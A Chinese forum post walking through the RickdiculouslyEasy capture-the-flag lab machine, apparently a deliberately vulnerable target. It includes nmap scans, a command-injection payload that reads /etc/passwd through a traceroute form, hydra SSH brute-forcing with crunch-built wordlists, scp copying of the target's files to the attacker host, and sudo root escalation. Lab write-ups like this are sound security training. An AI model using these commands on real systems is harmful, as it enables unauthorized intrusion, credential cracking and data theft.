首页
论坛
课程
招聘
[原创]RickdiculouslyEasy-CTF挑战
2021-3-8 21:43 3663

[原创]RickdiculouslyEasy-CTF挑战

2021-3-8 21:43
3663

RickdiculouslyEasy-CTF挑战

 

注:请严格遵守网络安全法,本文章以培养网络安全人才为核心。

 

目录

RickdiculouslyEasy

这个靶机一共有12个flag,一共是130,我们一起来进行这个挑战,看看大家能够拿到多少个flag

信息收集

1
nmap -A -sV -O -T4 -P- 10.10.10.221

图片描述
我们可以看到ftp版本比较的低

尝试匿名登录ftp

图片描述

1
2
3
ftp 10.10.10.221
#注意密码为空格
get FLAG.txt    #使用get命令下载

拿到后我们cat查看flag

 

图片描述
现在我们拿到了10分

尝试登录ssh

图片描述
他说SHH关闭???
我们再去看看nmap扫描信息
图片描述

SHH还标记了问号,他说欢迎访问Ubuntu系统??,因此我们可以判断这个ssh是伪造的,那么我们就绕开它不耽误时间了。

访问80端口

1
http://10.10.10.221

图片描述
图片描述
发现了一个大头,好像很聪明的样子,得知这个头像名字叫做morty,应该是个动漫人物,感兴趣的朋友可以去看看,那么进来了,我们可以使用robots.txt协议看一下
图片描述
经过几番尝试,我发现第二个目录可以访问
图片描述

这个东西我们一会再仔细给大家讲解,不慌,我们再看看其他的几个端口。

访问9090端口

这个端口开启了web服务,我们访问站点看一看
图片描述

我们又获得了一个flag,得到了第二十分。

nmap13337端口扫描发现flag

图片描述

观察nmap就发现了这个flag,没有想到居然能够那么容易就又拿到10分。

发现伪装的SSH端口

我们发现这个端口是ssh端口,它进行了伪装

 

图片描述

使用nc连接后门

图片描述
在这里我们可以看到,这里有一个后门,那么我们可以使用nc连接一下

1
nc 10.10.10.221 60000

图片描述

又拿到了一个flag,你欣喜若狂,你以为可以提权直接完事的时候,然而啪啪打脸。

 

图片描述
这东西好像除了让你看到flag,其他的什么也干不成!

对站点进行目录扫描

1
nikto -host http://10.10.10.221

图片描述
添加使用目录

1
http://10.10.10.221/passwords/

图片描述
这里我们也看到了一个flag
图片描述
图片描述

第二个目录说
哇,莫迪真聪明。将密码存储在一个名为password .html的文件中?这次你真的做到了,莫蒂。至少让我把它们藏起来。我会把它们全删了但我知道你会去找你妈妈。这是我最不需要的

 

我们看一下它的代码
图片描述
在这里我们好像发现了它的密码

先把它存在我们的密码字典中,留着准备一会看看能不能进行暴力破解

命令注入漏洞

我们再回到http://10.10.10.221/cgi-bin/tracertool.cgi这个目录

 

图片描述
可以看到这个小东西,有路由跟踪的功能。

那么我们可以进行拼接来查看系统信息;这是一个命令注入漏洞。

1
127.0.0.1;cat /etc/passwd

图片描述

cat 命令出来一只猫,还真是,cat不就是猫吗,既然不让我们用,那我们用其他的用户来查看系统用户文件

1
127.0.0.1;less /etc/passwd

图片描述

1
2
3
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash

在这我们拿到了它的三个用户,我们之前不是在源代码中找到一个密码?那么我们现在可以进行暴力破解了

暴力破解SSH用户

1
hydra -L user.txt -P passwd.txt 10.10.10.221 -s22222 ssh

图片描述

使用SSH连接用户

1
2
ssh -p22222 Summer@10.10.10.221
#    -p 指定端口

图片描述

60分了

 

图片描述

看另外两个文件,好像不能够查看,我们使用scp命令将它拷贝到kali中来查看

1
2
3
4
# scp 安全的远程拷贝工具
scp /home/Morty/journal.txt.zip root@10.10.10.128:~/work/exam/RickdiculouslyEasy
 
scp /home/Morty/Safe_Password.jpg  root@10.10.10.128:~/work/exam/RickdiculouslyEasy

图片描述
东西拷贝过来了发现居然还要密码,有些让人无奈
图片描述

而另一个呢是个图片文件

隐写术

  • 取证工具(binwalk)

Binwalk是一款快速,易用,用于分析,逆向工程和提取固件映像的工具

另一个图片文件它说是安全的密码,这就涉及到了密码学隐写术了。

 

图片描述
我们拿到了压缩包密码,去看看有什么花样
图片描述

我们拿到了一个价值20分的flag,他说rike告诉他一个天大的秘密,一个安全的密码 safe

 

我们进入到rike目录下将文件全部拷贝到当前用户

1
2
cp RICKS_SAFE/safe /home/Summer/
cp ThisDoesntContainAnyFlags/NotAFlag.txt /home/Summer/

图片描述

这个文件拷贝到远程没有用,ls -l看到safe是个可执行文件,./执行没有作用 他说该死的命令行,后面的那个单词好像是参数,
把之前的数字参数和现在的safe文件连接起来在本地执行,就获得了到了这个flag和提示!

 

图片描述

 

这里面有一些提示我们来看看

1 uppercase character
1 digit
One of the words in my old bands name.� @

社工找到rike以前乐队的名字

图片描述
The Flesh Curtains

 

使用给定字符集制作口令字典的工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
语法:
crunch <min-len> <max-len> [<charset string>] [options]
crunch 最小长度    最大长度    字符(集)            选项
 
常用选项:
-t    #定义输出格式
@代表小写字母
,代表大写字母
%代表数字
^代表符号
 
**The Flesh Curtains rike以前的乐队**
口令:
大写字母(26英文字母)
数字
乐队当中的一个单词
 
crunch 5 5 -t ,%The > rike-pass.txt
crunch 7 7 -t ,%Flesh >> rike-pass.txt
crunch 10 10 -t ,%Curtains >>rike-pass.txt

将字典做好后便可进行暴力破解

使用hydir进行暴力破解

1
hydra -l RickSanchez -P rike-pass.txt ssh://10.10.10.221:22222

使用SSH登录用户

1
2
3
ssh -22222 RickSanchez@10.10.10.221
 
sudo su  #使用sudo提权

图片描述
然后我们就拿到了130分,这章靶机完结不知道大家没有什么收获哈哈哈


恭喜ID[飞翔的猫咪]获看雪安卓应用安全能力认证高级安全工程师!!

上传的附件:
收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回